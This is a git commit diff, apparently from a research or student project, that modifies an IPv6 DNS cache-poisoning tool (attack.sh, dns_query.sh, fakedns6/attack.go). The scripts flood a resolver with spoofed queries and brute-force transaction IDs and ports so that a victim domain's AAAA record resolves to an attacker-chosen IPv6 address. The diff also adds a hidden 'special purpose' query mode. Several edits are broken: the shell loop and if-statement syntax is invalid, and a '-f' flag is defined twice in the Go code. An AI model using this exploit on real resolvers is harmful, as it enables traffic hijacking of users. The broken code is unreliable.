20231116-工具代码测试

author: 韩丁康 <[email protected]> 2023-11-16 15:27:17 +0800
committer: 韩丁康 <[email protected]> 2023-11-16 15:27:17 +0800
commit: 96d95325787050c7a8e71e59fa09f2bbefe485ee (patch)
tree: 8570b780e7394eb798ac19b65603772cd016e776
parent: e60c7d232865309eb4546c08b9a3a194733420fa (diff)
3 files changed, 57 insertions, 31 deletions
diff --git a/attack.sh b/attack.sh
index 85acfd4..5a1955c 100644
--- a/attack.sh
+++ b/attack.sh
@@ -3,32 +3,31 @@
 # Please run with sudo.
 
 # Verify the existing record domain, just for proof purposes.
-echo 'Before attack:'
+echo '原记录:'
 dig @$1 $4 AAAA
-echo '10s to start attack...'
-sleep 10
 
-# flood
-# This is specifically for BIND. To prevent it from answering queries sent by 1.2.3.4, we spoof 1.2.3.250 to flood queries. BIND will then block all queries from the same /24 network.
-#sh ./dns_query.sh $5 `echo $1 | sed -E 's/\.[0-9]*$/\.250/g'` 789 `echo $4 | sed "s/\./ /g"`
-bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`
 
-# Start attack
-# Change the argument accordingly
-time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -ad $2 -tg 0 -s 10000 -e 65000 -j 0
-
-# Attack finished
-# Kill the flooding process.
-# pkill hping
-# Validations
-echo 'After attack:'
-dig @$1 $4 AAAA
-echo 'If there is no change in result, please wait for the original cache to expire. Otherwise please terminate the attack by Ctrl-C.'
-sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
-echo "Wait for $sleeptime seconds..."
-sleep $sleeptime
-echo 'Cache should be poisoned now:'
-dig @$1 $4 AAAA
-echo 'Wait for another 2 seconds...'
+success=0
+while $success!=1
+do
+  success=0
+  echo '10秒之后开始攻击...'
+  sleep 10
+  echo "开始攻击"
+  # flood
+  success=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
+  # Start attack
+  # Change the argument accordingly
+  time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+  # Validations
+  echo '攻击之后'
+  dig @$1 $4 AAAA
+  echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
+  echo "等待缓存过期"
+done
+# success
+echo '检测到攻击成功实现'
+echo '等待两秒，再次请求...'
 sleep 2
 dig @$1 $4 AAAA
+echo '攻击已完成！！！！'
diff --git a/dns_query.sh b/dns_query.sh
index db7973e..05aa1b4 100644
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -9,7 +9,6 @@ do
   echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
   echo -n "$var" >> dns_mid.bin
 done
-echo '10s to start attack...'
 # set a random TxID
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
@@ -18,5 +17,13 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
 # change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
 # fire!
 echo "fire"
-#sudo hping3 $1 -2 -p 53 -E dns.bin -d `du -b dns.bin | awk '{print $1}'` -i u50000 -a $2
 udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2
+a=$RANDOM %10
+echo 8
+if a>8
+do
+  ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
+  echo 1
+done
+
+
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index 49d1c49..d72cc9a 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -7,11 +7,13 @@ import (
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"github.com/google/gopacket/routing"
+	"github.com/miekg/dns"
 	"log"
 	"math/rand"
 	"net"
 	"os"
 	"strconv"
+	"strings"
 	"sync"
 	"time"
 )
@@ -449,22 +451,41 @@ func main() {
 	defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.")
 	repeatTimes := flag.Uint("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.")
 	timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.")
-	auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
+	//auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
+	attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
 	debugOutput := flag.Bool("d", false, "Debug output mode.")
 	attackerMaliciousDomain := flag.String("f", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
 	soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
 
+	//特殊用途
+	isfake := flag.String("f", "0", "")
 	flag.Parse()
 	//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
 	Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
-		*attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *auxiliaryDomain, *soaName)
+		*attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attackertarget, *soaName, *isfake)
 	os.Exit(0)
 }
 
 func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
-	defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, auxiliaryDomainArg string,
-	soaNameArg string) {
+	defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
+	soaNameArg string, isfake string) {
 	fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
+
+	// 特殊用途
+	if isfake == "1" {
+		c := new(dns.Client)
+		msg := new(dns.Msg)
+		if strings.Contains(attackertargetIP, ":") {
+			ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
+			domain := ipcode + "." + victimDNSNameArg
+			msg.SetQuestion(domain, dns.TypeAAAA)
+			_, _, _ = c.Exchange(msg, resolverBackendIPArg.String())
+			return
+		} else {
+			println("参数有误，请输入IPv6地址作为篡改目标结果")
+		}
+
+	}
 	rand.Seed(time.Now().UnixNano())
 	handle, _ = pcap.OpenLive(
 		ifaceName,
@@ -493,7 +514,6 @@ func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBack
 	victimDNSName = victimDNSNameArg
 	debugOutput = debugOutputArg
 	timeGap = timeGapArg
-	auxiliaryDomain = auxiliaryDomainArg
 	soaName = soaNameArg
 
 	localIP, _ = GetIfaceAddrMulti(iface)
author	韩丁康 <[email protected]>	2023-11-16 15:27:17 +0800
committer	韩丁康 <[email protected]>	2023-11-16 15:27:17 +0800
commit	96d95325787050c7a8e71e59fa09f2bbefe485ee (patch)
tree	8570b780e7394eb798ac19b65603772cd016e776
parent	e60c7d232865309eb4546c08b9a3a194733420fa (diff)